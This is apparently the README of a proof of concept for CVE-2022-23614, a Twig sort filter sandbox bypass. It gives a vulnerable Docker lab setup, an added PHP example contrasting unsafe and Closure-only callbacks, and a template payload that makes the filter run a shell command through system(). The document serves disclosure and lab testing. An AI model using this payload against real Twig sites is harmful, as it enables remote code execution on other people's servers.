CVE-2022-23614

PoC for CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Twig sort filter code execution/sandbox bypass)

As seen in this commit (https://github.com/twigphp/Twig/commit/..), Twig was passing a user-supplied function name as the callback parameter to uasort, which leads to arbitrary code execution.
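The bug class described above, as an added example (not Twig's code and not part of the original README): a hypothetical `sort_filter_unsafe` hands any callable to `uasort`, while `sort_filter_safe` accepts only `Closure` objects when sandboxed. The function names, the `$sandboxed` flag and the harmless `audit_marker` function are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-ins for a template "sort" filter; not Twig's source.

// Vulnerable shape: any PHP callable is accepted. A plain string naming a
// global function is a valid callable, so template input chooses the function.
function sort_filter_unsafe(array $items, $arrow = null): array
{
    if ($arrow !== null) {
        uasort($items, $arrow);   // $arrow may be a template-supplied string
    } else {
        asort($items);
    }
    return $items;
}

// Hardened shape: while sandboxed, only Closure objects are accepted.
function sort_filter_safe(array $items, $arrow = null, bool $sandboxed = true): array
{
    if ($arrow !== null && $sandboxed && !($arrow instanceof Closure)) {
        throw new RuntimeException('The callable passed to "sort" must be a Closure in sandbox mode.');
    }
    return sort_filter_unsafe($items, $arrow);
}

// Constructed, harmless marker standing in for a sensitive global function.
function audit_marker(string $a, string $b): int
{
    echo "global function reached with: {$a}, {$b}\n";
    return 0;
}

$input = ['first', 'second'];   // constructed sample data

// The string callable is accepted, so the marker function runs.
sort_filter_unsafe($input, 'audit_marker');

// The same string callable is refused by the hardened filter.
try {
    sort_filter_safe($input, 'audit_marker');
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// A Closure is still accepted, so legitimate custom ordering keeps working.
print_r(sort_filter_safe(['b', 'a'], fn ($x, $y) => $x <=> $y));
```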

To build and run the Docker container with a vulnerable Twig version:

$ ./build-docker.sh

Open the webpage at localhost:1337 and try rendering the following payload:

{{ ['id','']|sort('system') }}
